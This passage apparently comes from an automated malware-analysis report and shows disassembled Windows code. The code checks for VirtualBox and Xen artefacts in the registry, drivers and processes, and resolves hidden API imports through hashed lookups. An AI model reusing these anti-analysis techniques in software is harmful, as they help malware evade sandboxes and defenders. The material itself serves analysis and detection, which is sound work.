004129FD mov eax, dword ptr [00411F80h] 79617274
00412A02 mov dword ptr [ebp-00000664h], eax
00412A08 mov ecx, dword ptr [00411F84h] 6578652E
00412A0E mov dword ptr [ebp-00000660h], ecx
00412A14 mov dl, byte ptr [00411F88h] 00
00412A1A mov byte ptr [ebp-0000065Ch], dl
00412A20 xor eax, eax
00412A22 mov dword ptr [ebp-0000065Bh], eax
00412A28 mov word ptr [ebp-00000657h], ax
00412A2F mov byte ptr [ebp-00000655h], al
00412A35 mov ecx, dword ptr [00411F8Ch] ASCII "HARDWARE\ACPI\DSDT"
00412A3B mov dword ptr [ebp-00000580h], ecx
00412A41 mov edx, dword ptr [00411F90h] 45524157
00412A47 mov dword ptr [ebp-0000057Ch], edx
00412A4D mov eax, dword ptr [00411F94h] 5043415C
00412A52 mov dword ptr [ebp-00000578h], eax
00412A58 mov ecx, dword ptr [00411F98h] 53445C49
00412A5E mov dword ptr [ebp-00000574h], ecx
00412A64 mov dx, word ptr [00411F9Ch] 5444
00412A6B mov word ptr [ebp-00000570h], dx
00412A72 mov al, byte ptr [00411F9Eh] 00
00412A77 mov byte ptr [ebp-0000056Eh], al
00412A7D push 00000051h
00412A7F push 00000000h
00412A81 lea ecx, dword ptr [ebp-0000056Dh]
00412A87 push ecx
00412A88 call 00415F8Fh
00412A8D add esp, 0Ch
00412A90 mov edx, dword ptr [00411FA0h] ASCII "HARDWARE\ACPI\FADT"
00412A96 mov dword ptr [ebp-0000051Ch], edx
00412A9C mov eax, dword ptr [00411FA4h] 45524157
00412AA1 mov dword ptr [ebp-00000518h], eax
00412AA7 mov ecx, dword ptr [00411FA8h] 5043415C
00412AAD mov dword ptr [ebp-00000514h], ecx
00412AB3 mov edx, dword ptr [00411FACh] 41465C49
00412AB9 mov dword ptr [ebp-00000510h], edx
00412ABF mov ax, word ptr [00411FB0h] 5444
00412AC5 mov word ptr [ebp-0000050Ch], ax
00412ACC mov cl, byte ptr [00411FB2h] 00
00412AD2 mov byte ptr [ebp-0000050Ah], cl
00412AD8 push 00000051h
00412ADA push 00000000h
00412ADC lea edx, dword ptr [ebp-00000509h]
00412AE2 push edx
00412AE3 call 00415F8Fh
00412AE8 add esp, 0Ch
00412AEB mov eax, dword ptr [00411FB4h] ASCII "HARDWARE\ACPI\RSDT"
00412AF0 mov dword ptr [ebp-000004B8h], eax
00412AF6 mov ecx, dword ptr [00411FB8h] 45524157
00412AFC mov dword ptr [ebp-000004B4h], ecx
00412B02 mov edx, dword ptr [00411FBCh] 5043415C
00412B08 mov dword ptr [ebp-000004B0h], edx
00412B0E mov eax, dword ptr [00411FC0h] 53525C49
00412B13 mov dword ptr [ebp-000004ACh], eax
00412B19 mov cx, word ptr [00411FC4h] 5444
00412B20 mov word ptr [ebp-000004A8h], cx
00412B27 mov dl, byte ptr [00411FC6h] 00
00412B2D mov byte ptr [ebp-000004A6h], dl
00412B33 push 00000051h
00412B35 push 00000000h
00412B37 lea eax, dword ptr [ebp-000004A5h]
00412B3D push eax
00412B3E call 00415F8Fh
00412B43 add esp, 0Ch
00412B46 mov ecx, 00000007h
00412B4B mov esi, 00411FC8h ASCII "SYSTEM\ControlSet001\Services"
00412B50 lea edi, dword ptr [ebp-00000454h]
00412B56 rep movsd
00412B58 movsw
00412B5A push 00000046h
00412B5C push 00000000h
00412B5E lea ecx, dword ptr [ebp-00000436h]
00412B64 push ecx
00412B65 call 00415F8Fh
00412B6A add esp, 0Ch
00412B6D mov ecx, 00000013h
00412B72 mov esi, 00411FE8h ASCII "HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0"
00412B77 lea edi, dword ptr [ebp-000003F0h]
00412B7D rep movsd
00412B7F movsb
00412B80 xor edx, edx
00412B82 mov dword ptr [ebp-000003A3h], edx
00412B88 mov dword ptr [ebp-0000039Fh], edx
00412B8E mov dword ptr [ebp-0000039Bh], edx
00412B94 mov dword ptr [ebp-00000397h], edx
00412B9A mov dword ptr [ebp-00000393h], edx
00412BA0 mov word ptr [ebp-0000038Fh], dx
00412BA7 mov byte ptr [ebp-0000038Dh], dl
00412BAD mov ecx, 00000007h
00412BB2 mov esi, 00412038h ASCII "HARDWARE\DESCRIPTION\System"
00412BB7 lea edi, dword ptr [ebp-0000038Ch]
00412BBD rep movsd
00412BBF push 00000048h
00412BC1 push 00000000h
00412BC3 lea eax, dword ptr [ebp-00000370h]
00412BC9 push eax
00412BCA call 00415F8Fh
00412BCF add esp, 0Ch
00412BD2 mov ecx, dword ptr [00412054h] ASCII "VBOX__"
00412BD8 mov dword ptr [ebp-00000328h], ecx
00412BDE mov dx, word ptr [00412058h] 5F5F
00412BE5 mov word ptr [ebp-00000324h], dx
00412BEC mov al, byte ptr [0041205Ah] 00
00412BF1 mov byte ptr [ebp-00000322h], al
00412BF7 push 0000005Dh
00412BF9 push 00000000h
00412BFB lea ecx, dword ptr [ebp-00000321h]
00412C01 push ecx
00412C02 call 00415F8Fh
00412C07 add esp, 0Ch
00412C0A mov dl, byte ptr [00411992h] 00
00412C10 mov byte ptr [ebp-000002C4h], dl
00412C16 push 00000063h
00412C18 push 00000000h
00412C1A lea eax, dword ptr [ebp-000002C3h]
00412C20 push eax
00412C21 call 00415F8Fh
00412C26 add esp, 0Ch
00412C29 mov cl, byte ptr [00411993h] 00
00412C2F mov byte ptr [ebp-00000260h], cl
00412C35 push 00000063h
00412C37 push 00000000h
00412C39 lea edx, dword ptr [ebp-0000025Fh]
00412C3F push edx
00412C40 call 00415F8Fh
00412C45 add esp, 0Ch
00412C48 mov al, byte ptr [00411997h] 00
00412C4D mov byte ptr [ebp-000001FCh], al
00412C53 push 00000063h
00412C55 push 00000000h
00412C57 lea ecx, dword ptr [ebp-000001FBh]
00412C5D push ecx
00412C5E call 00415F8Fh
00412C63 add esp, 0Ch
00412C66 mov edx, dword ptr [0041205Ch] ASCII "VBoxMouse"
00412C6C mov dword ptr [ebp-00000198h], edx
00412C72 mov eax, dword ptr [00412060h] 73756F4D
00412C77 mov dword ptr [ebp-00000194h], eax
00412C7D mov cx, word ptr [00412064h] 0065
00412C84 mov word ptr [ebp-00000190h], cx
00412C8B push 0000005Ah
00412C8D push 00000000h
00412C8F lea edx, dword ptr [ebp-0000018Eh]
00412C95 push edx
00412C96 call 00415F8Fh
00412C9B add esp, 0Ch
00412C9E mov eax, dword ptr [00412068h] ASCII "VBoxGuest"
00412CA3 mov dword ptr [ebp-00000134h], eax
00412CA9 mov ecx, dword ptr [0041206Ch] 73657547
00412CAF mov dword ptr [ebp-00000130h], ecx
00412CB5 mov dx, word ptr [00412070h] 0074
00412CBC mov word ptr [ebp-0000012Ch], dx
00412CC3 push 0000005Ah
00412CC5 push 00000000h
00412CC7 lea eax, dword ptr [ebp-0000012Ah]
00412CCD push eax
00412CCE call 00415F8Fh
00412CD3 add esp, 0Ch
00412CD6 mov ecx, dword ptr [00412074h] ASCII "VBoxService"
00412CDC mov dword ptr [ebp-000000D0h], ecx
00412CE2 mov edx, dword ptr [00412078h] 76726553
00412CE8 mov dword ptr [ebp-000000CCh], edx
00412CEE mov eax, dword ptr [0041207Ch] 00656369
00412CF3 mov dword ptr [ebp-000000C8h], eax
00412CF9 push 00000058h
00412CFB push 00000000h
00412CFD lea ecx, dword ptr [ebp-000000C4h]
00412D03 push ecx
00412D04 call 00415F8Fh
00412D09 add esp, 0Ch
00412D0C mov edx, dword ptr [00412080h] ASCII "VBoxSF"
00412D12 mov dword ptr [ebp-6Ch], edx
00412D15 mov ax, word ptr [00412084h] 4653
00412D1B mov word ptr [ebp-68h], ax
00412D1F mov cl, byte ptr [00412086h] 00
00412D25 mov byte ptr [ebp-66h], cl
00412D28 push 0000005Dh
00412D2A push 00000000h
00412D2C lea edx, dword ptr [ebp-65h]
00412D2F push edx
00412D30 call 00415F8Fh
00412D35 add esp, 0Ch
00412D38 mov eax, dword ptr [00412088h] ASCII "Identifier"
00412D3D mov dword ptr [ebp-00000648h], eax
00412D43 mov ecx, dword ptr [0041208Ch] 69666974
00412D49 mov dword ptr [ebp-00000644h], ecx
00412D4F mov dx, word ptr [00412090h] 7265
00412D56 mov word ptr [ebp-00000640h], dx
00412D5D mov al, byte ptr [00412092h] 00
00412D62 mov byte ptr [ebp-0000063Eh], al
00412D68 push 00000059h
00412D6A push 00000000h
00412D6C lea ecx, dword ptr [ebp-0000063Dh]
00412D72 push ecx
00412D73 call 00415F8Fh
00412D78 add esp, 0Ch
00412D7B mov edx, dword ptr [00412094h] ASCII "SystemBiosVersion"
00412D81 mov dword ptr [ebp-000005E4h], edx
00412D87 mov eax, dword ptr [00412098h] 69426D65
00412D8C mov dword ptr [ebp-000005E0h], eax
00412D92 mov ecx, dword ptr [0041209Ch] 6556736F
00412D98 mov dword ptr [ebp-000005DCh], ecx
00412D9E mov edx, dword ptr [004120A0h] 6F697372
00412DA4 mov dword ptr [ebp-000005D8h], edx
00412DAA mov ax, word ptr [004120A4h] 006E
00412DB0 mov word ptr [ebp-000005D4h], ax
00412DB7 push 00000052h
00412DB9 push 00000000h
00412DBB lea ecx, dword ptr [ebp-000005D2h]
00412DC1 push ecx
00412DC2 call 00415F8Fh
00412DC7 add esp, 0Ch
00412DCA mov edx, dword ptr [004120A8h] ASCII "VBOX"
00412DD0 mov dword ptr [ebp-00000650h], edx
00412DD6 mov al, byte ptr [004120ACh] 00
00412DDB mov byte ptr [ebp-0000064Ch], al
00412DE1 xor ecx, ecx
00412DE3 mov word ptr [ebp-04h], cx
00412DE7 jmp 00412DF5h
00412DE9 mov dx, word ptr [ebp-04h] xrefs 00412E2C
00412DED add dx, 0001h
00412DF1 mov word ptr [ebp-04h], dx
00412DF5 movzx eax, word ptr [ebp-04h] xrefs 00412DE7
00412DF9 cmp eax, 03h
00412DFC jnl 00412E2Eh
00412DFE push 00000004h
00412E00 lea ecx, dword ptr [ebp-00000328h]
00412E06 push ecx
00412E07 movzx edx, word ptr [ebp-04h]
00412E0B imul edx, edx, 64h
00412E0E lea eax, dword ptr [ebp+edx-00000580h]
00412E15 push eax
00412E16 call 00413450h
00412E1B add esp, 0Ch
00412E1E movzx ecx, al
00412E21 test ecx, ecx
00412E23 je 00412E2Ch
00412E25 mov al, 01h
00412E27 jmp 00412F26h
00412E2C jmp 00412DE9h xrefs 00412E23
00412E2E movzx edx, word ptr [ebp-04h] xrefs 00412DFC
00412E32 imul edx, edx, 64h
00412E35 lea eax, dword ptr [ebp+edx-00000580h]
00412E3C mov dword ptr [ebp-00000680h], eax
00412E42 push 00000004h
00412E44 lea ecx, dword ptr [ebp-00000198h]
00412E4A push ecx
00412E4B mov edx, dword ptr [ebp-00000680h]
00412E51 push edx
00412E52 call 00413450h
00412E57 add esp, 0Ch
00412E5A movzx eax, al
00412E5D mov cx, word ptr [ebp-04h]
00412E61 add cx, 0001h
00412E65 mov word ptr [ebp-04h], cx
00412E69 test eax, eax
00412E6B je 00412E74h
00412E6D mov al, 01h
00412E6F jmp 00412F26h
00412E74 xor edx, edx xrefs 00412E6B
00412E76 mov word ptr [ebp-00000654h], dx
00412E7D jmp 00412E91h
00412E7F mov ax, word ptr [ebp-00000654h] xrefs 00412EE1
00412E86 add ax, 0001h
00412E8A mov word ptr [ebp-00000654h], ax
00412E91 movzx ecx, word ptr [ebp-00000654h] xrefs 00412E7D
00412E98 cmp ecx, 02h
00412E9B jnl 00412EE3h
00412E9D lea edx, dword ptr [ebp-00000650h]
00412EA3 push edx
00412EA4 movzx eax, word ptr [ebp-00000654h]
00412EAB imul eax, eax, 64h
00412EAE lea ecx, dword ptr [ebp+eax-00000648h]
00412EB5 push ecx
00412EB6 movzx edx, word ptr [ebp-04h]
00412EBA movzx eax, word ptr [ebp-00000654h]
00412EC1 add edx, eax
00412EC3 imul edx, edx, 64h
00412EC6 lea ecx, dword ptr [ebp+edx-00000580h]
00412ECD push ecx
00412ECE call 00413560h
00412ED3 add esp, 0Ch
00412ED6 movzx edx, al
00412ED9 test edx, edx
00412EDB je 00412EE1h
00412EDD mov al, 01h
00412EDF jmp 00412F26h
00412EE1 jmp 00412E7Fh xrefs 00412EDB
00412EE3 xor eax, eax xrefs 00412E9B
00412EE5 mov word ptr [ebp-04h], ax
00412EE9 jmp 00412EF7h
00412EEB mov cx, word ptr [ebp-04h] xrefs 00412F22
00412EEF add cx, 0001h
00412EF3 mov word ptr [ebp-04h], cx
00412EF7 movzx edx, word ptr [ebp-04h] xrefs 00412EE9
00412EFB cmp edx, 02h
00412EFE jnl 00412F24h
00412F00 movzx eax, word ptr [ebp-04h]
00412F04 imul eax, eax, 14h
00412F07 lea ecx, dword ptr [ebp+eax-0000067Ch]
00412F0E push ecx
00412F0F call 00413380h
00412F14 add esp, 04h
00412F17 movzx edx, al
00412F1A test edx, edx
00412F1C je 00412F22h
00412F1E mov al, 01h
00412F20 jmp 00412F26h
00412F22 jmp 00412EEBh xrefs 00412F1C
00412F24 xor al, al xrefs 00412EFE
00412F26 pop edi xrefs 00412F20, 00412EDF, 00412E6F, 00412E27
00412F27 pop esi
00412F28 mov esp, ebp
00412F2A pop ebp
00412F2B ret function end
Function 00415D90, API count: 1, instr count: 50
APIs
    • LoadLibraryA.KERNEL32, ref: 004158E6
  • LoadLibraryA.KERNEL32, ref: 00415DFC
Address Instruction Meta Information
00415D90 push ebp xrefs 00415E7C
00415D91 mov ebp, esp
00415D93 sub esp, 00000110h
00415D99 mov dword ptr [ebp-04h], 00000000h
00415DA0 jmp 00415DABh
00415DA2 mov eax, dword ptr [ebp-04h] xrefs 00415E35
00415DA5 add eax, 01h
00415DA8 mov dword ptr [ebp-04h], eax
00415DAB cmp dword ptr [ebp-04h], 03h xrefs 00415DA0
00415DAF jnc 00415E3Ah
00415DB5 mov ecx, dword ptr [ebp-04h]
00415DB8 imul ecx, ecx, 06h
00415DBB mov edx, dword ptr [ecx+00416388h]
00415DC1 cmp edx, dword ptr [ebp+0Ch]
00415DC4 jne 00415E35h
00415DC6 mov eax, dword ptr [ebp-04h]
00415DC9 cmp dword ptr [00418C38h+eax*4], 00000000h
00415DD1 jne 00415E1Ah
00415DD3 lea ecx, dword ptr [ebp-00000110h]
00415DD9 push ecx
00415DDA mov edx, dword ptr [ebp-04h]
00415DDD imul edx, edx, 06h
00415DE0 movzx eax, word ptr [edx+0041638Ch]
00415DE7 add eax, 0041639Ah
00415DEC push eax
00415DED call 00415D50h
00415DF2 add esp, 08h
00415DF5 lea ecx, dword ptr [ebp-00000110h]
00415DFB push ecx
00415DFC call dword ptr [00418C44h] LoadLibraryA@KERNEL32.DLL (Hidden Import)
00415E02 mov edx, dword ptr [ebp-04h]
00415E05 mov dword ptr [00418C38h+edx*4], eax
00415E0C mov eax, dword ptr [ebp-04h]
00415E0F cmp dword ptr [00418C38h+eax*4], 00000000h
00415E17 jne 00415E1Ah
00415E19 int3
00415E1A push 00000000h xrefs 00415DD1, 00415E17
00415E1C mov ecx, dword ptr [ebp+08h]
00415E1F push ecx
00415E20 mov edx, dword ptr [ebp-04h]
00415E23 mov eax, dword ptr [00418C38h+edx*4]
00415E2A push eax
00415E2B call 00415760h
00415E30 add esp, 0Ch
00415E33 jmp 00415E3Bh
00415E35 jmp 00415DA2h xrefs 00415DC4
00415E3A int3 xrefs 00415DAF
00415E3B mov esp, ebp xrefs 00415E33
00415E3D pop ebp
00415E3E ret function end
Function 004160BE, API count: 1, instr count: 18
APIs
    • WriteFile.KERNEL32, ref: 004162D0
  • wvsprintfA.USER32, ref: 004160DC
Address Instruction Meta Information
004160BE push ebp xrefs 004155CA, 0041548A
004160BF mov ebp, esp
004160C1 sub esp, 00000400h
004160C7 lea eax, dword ptr [ebp+10h]
004160CA push eax
004160CB push dword ptr [ebp+0Ch]
004160CE lea eax, dword ptr [ebp-00000400h]
004160D4 push eax
004160D5 mov byte ptr [ebp-00000400h], 00000000h
004160DC call dword ptr [00401034h] wvsprintfA@USER32.DLL (Import)
004160E2 push dword ptr [ebp+08h]
004160E5 lea eax, dword ptr [ebp-00000400h]
004160EB push eax
004160EC call 004162AFh
004160F2 pop ecx Count = 2
004160F3 leave
004160F4 ret function end
Function 00416208, API count: 3, instr count: 72
APIs
    • HeapAlloc.KERNEL32, ref: 00415FFE
    • HeapFree.KERNEL32, ref: 004162F8
  • CloseHandle.KERNEL32, ref: 0041621C
  • CreateFileA.KERNEL32, ref: 00416288
  • SetFilePointer.KERNEL32, ref: 004162A1
Address Instruction Meta Information
00416208 push esi xrefs 004160B5
00416209 mov esi, dword ptr [esp+10h]
0041620D push edi
0041620E xor edi, edi
00416210 cmp esi, edi
00416212 je 0041624Ch
00416214 mov eax, dword ptr [esi]
00416216 cmp eax, FFFFFFFFh
00416219 je 00416222h
0041621B push eax
0041621C call dword ptr [00401004h] CloseHandle@KERNEL32.DLL (Import)
00416222 or dword ptr [esi], FFFFFFFFh xrefs 00416258, 00416219
00416225 or dword ptr [esi+04h], FFFFFFFFh
00416229 push ebx
0041622A mov ebx, dword ptr [esp+14h]
0041622E mov al, byte ptr [ebx]
00416230 cmp al, 61h
00416232 mov edx, C0000000h
00416237 je 00416270h
00416239 cmp al, 72h
0041623B je 00416267h
0041623D cmp al, 77h
0041623F je 0041625Eh
00416241 push esi xrefs 00416293
00416242 call 004162ECh
00416247 pop ecx
00416248 xor eax, eax
0041624A jmp 004162ABh
0041624C push 00000008h xrefs 00416212
0041624E call 00415FF2h
00416253 mov esi, eax
00416255 cmp esi, edi
00416257 pop ecx
00416258 jne 00416222h
0041625A xor eax, eax
0041625C jmp 004162ACh
0041625E mov eax, 40000000h xrefs 0041623F
00416263 push 00000002h
00416265 jmp 00416274h
00416267 mov eax, 80000000h xrefs 0041623B
0041626C push 00000003h
0041626E jmp 00416274h
00416270 mov eax, edx xrefs 00416237
00416272 push 00000004h
00416274 cmp byte ptr [ebx+01h], 0000002Bh xrefs 0041626E, 00416265
00416278 pop ecx
00416279 jne 0041627Dh
0041627B mov eax, edx
0041627E push edi Count = 2
0041627F push ecx
00416280 push edi
00416281 push 00000003h
00416283 push eax
00416284 push dword ptr [esp+28h]
00416288 call dword ptr [00401010h] CreateFileA@KERNEL32.DLL (Import)
0041628E mov edi, eax
00416290 cmp edi, FFFFFFFFh
00416293 je 00416241h
00416295 cmp byte ptr [ebx], 00000061h
00416298 jne 004162A7h
0041629A push 00000002h
0041629E push 00000000h Count = 2
004162A0 push edi
004162A1 call dword ptr [00401014h] SetFilePointer@KERNEL32.DLL (Import)
004162A7 mov dword ptr [esi], edi xrefs 00416298
004162A9 mov eax, esi
004162AB pop ebx xrefs 0041624A
004162AC pop edi xrefs 0041625C
004162AD pop esi
004162AE ret function end
Function 004136E0, API count: 1, instr count: 12
APIs
    • SwitchToThread.KERNEL32, ref: 00415E55
  • Process32Next.KERNEL32, ref: 004136FA
Address Instruction Meta Information
004136E0 push ebp xrefs 004133F3
004136E1 mov ebp, esp
004136E3 mov eax, dword ptr [ebp+0Ch]
004136E6 push eax
004136E7 mov ecx, dword ptr [ebp+08h]
004136EA push ecx
004136EB push 6B5366BEh
004136F0 push C930EA1Eh
004136F5 call 00415E40h
004136FA call eax Process32Next@KERNEL32.DLL (Hidden Import)
004136FC pop ebp
004136FD retn 0008h function end
Function 00415E40, API count: 1, instr count: 37
APIs
    • LoadLibraryA.KERNEL32, ref: 00415DFC
  • SwitchToThread.KERNEL32, ref: 00415E55
Address Instruction Meta Information
00415E40 push ebp xrefs 00413741, 004137A1, 0041377D, 00414AB1, 004149E9, 004141CA, 00414105, 00414A19, 004141F5, 00412265, 00412281, 004122A5, 004137F1, 00414A61, 00414A95, 00413FB9, 00414011, 00414239, 00414AD9, 00414B05, 00414B25, 00414B41, 00414B75, 0041443D, 00414465, 00414481, 0041449D, 004144E5, 00414511, 00414541, 00414565, 00414581, 00413F81, 004145A5, 004137D5, 004136B5, 004136D5, 00413711, 004136F5, 00414191, 00414281, 004156F9, 00414FFD, 00415025, 0041504D, 00415351, 0041536D, 004153A9, 00414121, 00414211, 0041414D, 00414171, 004140C1, 004141AD, 00413FE5, 0041403D, 00414075, 004140A1, 00413F65, 004140E1, 00414261
00415E41 mov ebp, esp
00415E43 push ecx
00415E44 mov eax, 00000001h xrefs 00415E5B
00415E49 mov ecx, 004164ECh
00415E4E xchg dword ptr [ecx], eax
00415E50 cmp eax, 01h
00415E53 jne 00415E5Dh
00415E55 call dword ptr [00418C48h] SwitchToThread@KERNEL32.DLL (Hidden Import)
00415E5B jmp 00415E44h
00415E5D mov edx, dword ptr [ebp+08h] xrefs 00415E53
00415E60 push edx
00415E61 mov ecx, 00416CF0h
00415E66 call 00415980h
00415E6B mov dword ptr [ebp-04h], eax
00415E6E cmp dword ptr [ebp-04h], 00000000h
00415E72 jne 00415E99h
00415E74 mov eax, dword ptr [ebp+0Ch]
00415E77 push eax
00415E78 mov ecx, dword ptr [ebp+08h]
00415E7B push ecx
00415E7C call 00415D90h
00415E81 add esp, 08h
00415E84 mov dword ptr [ebp-04h], eax
00415E87 mov edx, dword ptr [ebp-04h]
00415E8A push edx
00415E8B mov eax, dword ptr [ebp+08h]
00415E8E push eax
00415E8F mov ecx, 00416CF0h
00415E94 call 004159B0h
00415E99 xor ecx, ecx xrefs 00415E72
00415E9B mov edx, 004164ECh
00415EA0 xchg dword ptr [edx], ecx
00415EA2 mov eax, dword ptr [ebp-04h]
00415EA5 mov esp, ebp
00415EA7 pop ebp
00415EA8 retn 0008h function end
Function 00413700, API count: 1, instr count: 10
APIs
    • SwitchToThread.KERNEL32, ref: 00415E55
  • CloseHandle.KERNEL32, ref: 00413716
Address Instruction Meta Information
00413700 push ebp xrefs 00413442, 00414DAB, 0041532C, 004151B7, 0041517B, 00413D24, 00413D30, 00413D3C, 00413B62, 00413B6E, 00413B7A, 00413B20, 00413B2C, 00413AC2, 00413ACE, 00413A72, 00413A0B
00413701 mov ebp, esp
00413703 mov eax, dword ptr [ebp+08h]
00413706 push eax
00413707 push 6B5366BEh
0041370C push 723EB0D5h
00413711 call 00415E40h
00413716 call eax CloseHandle@KERNEL32.DLL (Import)
00413718 pop ebp
00413719 retn 0004h function end
Function 00412F30, API count: 0, instr count: 229
Strings
  • xenservice.exe, va: 004120B0
  • HARDWARE\ACPI\DSDT, va: 004120C0
  • HARDWARE\ACPI\FADT, va: 004120D4
  • HARDWARE\ACPI\RSDT, va: 004120E8
  • SYSTEM\ControlSet001\Services, va: 004120FC
  • Xen, va: 0041211C
  • xenevtchn, va: 00412120
  • xennet, va: 0041212C
  • xennet6, va: 00412134
  • xensvc, va: 0041213C
  • xenvdb, va: 00412144
Address Instruction Meta Information
00412F30 push ebp xrefs 0041481E
00412F31 mov ebp, esp
00412F33 sub esp, 00000590h
00412F39 push esi
00412F3A push edi
00412F3B mov eax, dword ptr [004120B0h] ASCII "xenservice.exe"
00412F40 mov dword ptr [ebp-00000590h], eax
00412F46 mov ecx, dword ptr [004120B4h] 69767265
00412F4C mov dword ptr [ebp-0000058Ch], ecx
00412F52 mov edx, dword ptr [004120B8h] 652E6563
00412F58 mov dword ptr [ebp-00000588h], edx
00412F5E mov ax, word ptr [004120BCh] 6578
00412F64 mov word ptr [ebp-00000584h], ax
00412F6B mov cl, byte ptr [004120BEh] 00
00412F71 mov byte ptr [ebp-00000582h], cl
00412F77 lea edx, dword ptr [ebp-00000590h]
00412F7D push edx
00412F7E call 00413380h
00412F83 add esp, 04h
00412F86 movzx eax, al
00412F89 test eax, eax
00412F8B je 00412F94h
00412F8D mov al, 01h
00412F8F jmp 004132D3h
00412F94 mov ecx, dword ptr [004120C0h] ASCII "HARDWARE\ACPI\DSDT" xrefs 00412F8B
00412F9A mov dword ptr [ebp-00000580h], ecx
00412FA0 mov edx, dword ptr [004120C4h] 45524157
00412FA6 mov dword ptr [ebp-0000057Ch], edx
00412FAC mov eax, dword ptr [004120C8h] 5043415C
00412FB1 mov dword ptr [ebp-00000578h], eax
00412FB7 mov ecx, dword ptr [004120CCh] 53445C49
00412FBD mov dword ptr [ebp-00000574h], ecx
00412FC3 mov dx, word ptr [004120D0h] 5444
00412FCA mov word ptr [ebp-00000570h], dx
00412FD1 mov al, byte ptr [004120D2h] 00
00412FD6 mov byte ptr [ebp-0000056Eh], al
00412FDC push 00000051h
00412FDE push 00000000h
00412FE0 lea ecx, dword ptr [ebp-0000056Dh]
00412FE6 push ecx
00412FE7 call 00415F8Fh
00412FEC add esp, 0Ch
00412FEF mov edx, dword ptr [004120D4h] ASCII "HARDWARE\ACPI\FADT"
00412FF5 mov dword ptr [ebp-0000051Ch], edx
00412FFB mov eax, dword ptr [004120D8h] 45524157
00413000 mov dword ptr [ebp-00000518h], eax
00413006 mov ecx, dword ptr [004120DCh] 5043415C
0041300C mov dword ptr [ebp-00000514h], ecx
00413012 mov edx, dword ptr [004120E0h] 41465C49
00413018 mov dword ptr [ebp-00000510h], edx
0041301E mov ax, word ptr [004120E4h] 5444
00413024 mov word ptr [ebp-0000050Ch], ax
0041302B mov cl, byte ptr [004120E6h] 00
00413031 mov byte ptr [ebp-0000050Ah], cl
00413037 push 00000051h
00413039 push 00000000h
0041303B lea edx, dword ptr [ebp-00000509h]
00413041 push edx
00413042 call 00415F8Fh
00413047 add esp, 0Ch
0041304A mov eax, dword ptr [004120E8h] ASCII "HARDWARE\ACPI\RSDT"
0041304F mov dword ptr [ebp-000004B8h], eax
00413055 mov ecx, dword ptr [004120ECh] 45524157
0041305B mov dword ptr [ebp-000004B4h], ecx
00413061 mov edx, dword ptr [004120F0h] 5043415C
00413067 mov dword ptr [ebp-000004B0h], edx
0041306D mov eax, dword ptr [004120F4h] 53525C49
00413072 mov dword ptr [ebp-000004ACh], eax
00413078 mov cx, word ptr [004120F8h] 5444
0041307F mov word ptr [ebp-000004A8h], cx
00413086 mov dl, byte ptr [004120FAh] 00
0041308C mov byte ptr [ebp-000004A6h], dl
00413092 push 00000051h
00413094 push 00000000h
00413096 lea eax, dword ptr [ebp-000004A5h]
0041309C push eax
0041309D call 00415F8Fh
004130A2 add esp, 0Ch
004130A5 mov ecx, 00000007h
004130AA mov esi, 004120FCh ASCII "SYSTEM\ControlSet001\Services"
004130AF lea edi, dword ptr [ebp-00000454h]
004130B5 rep movsd
004130B7 movsw
004130B9 push 00000046h
004130BB push 00000000h
004130BD lea ecx, dword ptr [ebp-00000436h]
004130C3 push ecx
004130C4 call 00415F8Fh
004130C9 add esp, 0Ch
004130CC mov edx, dword ptr [0041211Ch] ASCII "Xen"
004130D2 mov dword ptr [ebp-000003F0h], edx
004130D8 push 00000060h
004130DA push 00000000h
004130DC lea eax, dword ptr [ebp-000003ECh]
004130E2 push eax
004130E3 call 00415F8Fh
004130E8 add esp, 0Ch
004130EB mov cl, byte ptr [0041199Bh] 00
004130F1 mov byte ptr [ebp-0000038Ch], cl
004130F7 push 00000063h
004130F9 push 00000000h
004130FB lea edx, dword ptr [ebp-0000038Bh]
00413101 push edx
00413102 call 00415F8Fh
00413107 add esp, 0Ch
0041310A mov al, byte ptr [0041199Fh] 00
0041310F mov byte ptr [ebp-00000328h], al
00413115 push 00000063h
00413117 push 00000000h
00413119 lea ecx, dword ptr [ebp-00000327h]
0041311F push ecx
00413120 call 00415F8Fh
00413125 add esp, 0Ch
00413128 mov dl, byte ptr [004119A3h] 00
0041312E mov byte ptr [ebp-000002C4h], dl
00413134 push 00000063h
00413136 push 00000000h
00413138 lea eax, dword ptr [ebp-000002C3h]
0041313E push eax
0041313F call 00415F8Fh
00413144 add esp, 0Ch
00413147 mov cl, byte ptr [004119A7h] 00
0041314D mov byte ptr [ebp-00000260h], cl
00413153 push 00000063h
00413155 push 00000000h
00413157 lea edx, dword ptr [ebp-0000025Fh]
0041315D push edx
0041315E call 00415F8Fh
00413163 add esp, 0Ch
00413166 mov eax, dword ptr [00412120h] ASCII "xenevtchn"
0041316B mov dword ptr [ebp-000001FCh], eax
00413171 mov ecx, dword ptr [00412124h] 68637476
00413177 mov dword ptr [ebp-000001F8h], ecx
0041317D mov dx, word ptr [00412128h] 006E
00413184 mov word ptr [ebp-000001F4h], dx
0041318B push 0000005Ah
0041318D push 00000000h
0041318F lea eax, dword ptr [ebp-000001F2h]
00413195 push eax
00413196 call 00415F8Fh
0041319B add esp, 0Ch
0041319E mov ecx, dword ptr [0041212Ch] ASCII "xennet"
004131A4 mov dword ptr [ebp-00000198h], ecx
004131AA mov dx, word ptr [00412130h] 7465
004131B1 mov word ptr [ebp-00000194h], dx
004131B8 mov al, byte ptr [00412132h] 00
004131BD mov byte ptr [ebp-00000192h], al
004131C3 push 0000005Dh
004131C5 push 00000000h
004131C7 lea ecx, dword ptr [ebp-00000191h]
004131CD push ecx
004131CE call 00415F8Fh
004131D3 add esp, 0Ch
004131D6 mov edx, dword ptr [00412134h] ASCII "xennet6"
004131DC mov dword ptr [ebp-00000134h], edx
004131E2 mov eax, dword ptr [00412138h] 00367465
004131E7 mov dword ptr [ebp-00000130h], eax
004131ED push 0000005Ch
004131EF push 00000000h
004131F1 lea ecx, dword ptr [ebp-0000012Ch]
004131F7 push ecx
004131F8 call 00415F8Fh
004131FD add esp, 0Ch
00413200 mov edx, dword ptr [0041213Ch] ASCII "xensvc"
00413206 mov dword ptr [ebp-000000D0h], edx
0041320C mov ax, word ptr [00412140h] 6376
00413212 mov word ptr [ebp-000000CCh], ax
00413219 mov cl, byte ptr [00412142h] 00
0041321F mov byte ptr [ebp-000000CAh], cl
00413225 push 0000005Dh
00413227 push 00000000h
00413229 lea edx, dword ptr [ebp-000000C9h]
0041322F push edx
00413230 call 00415F8Fh
00413235 add esp, 0Ch
00413238 mov eax, dword ptr [00412144h] ASCII "xenvdb"
0041323D mov dword ptr [ebp-6Ch], eax
